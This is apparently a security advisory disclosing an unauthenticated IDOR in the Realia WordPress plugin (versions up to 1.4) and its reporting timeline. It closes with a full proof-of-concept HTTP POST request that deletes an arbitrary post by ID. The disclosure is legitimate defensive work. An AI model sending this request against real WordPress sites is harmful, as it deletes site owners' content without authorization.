Realia <= 1.4 - Unauthenticated IDOR leading to Arbitrary Post Deletion

While investigating an IDOR issue on a premium theme, allowing arbitrary deletion of Ads, submitted by Vlad Vector, the Realia plugin was found to be the root cause.

In fact, having this plugin installed (which some themes require) can allow unauthenticated attackers to delete arbitrary posts, by submitting a malicious request with the post ID to delete.

The issue was reported to the WP plugins team on August 5th, 2020 and they investigated it on August 14th, 2020. The plugin was later closed from the WordPress repository and is not available for download anymore.

For more details, including about the premium theme and timeline, please refer to the link in the reference.

This will delete the Post with id 7:

POST / HTTP/1.1
Host: 127.0.0.1
User-Agent: PoC/Realia-1.4-IDOR
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 35

property_id=7&remove_property_form=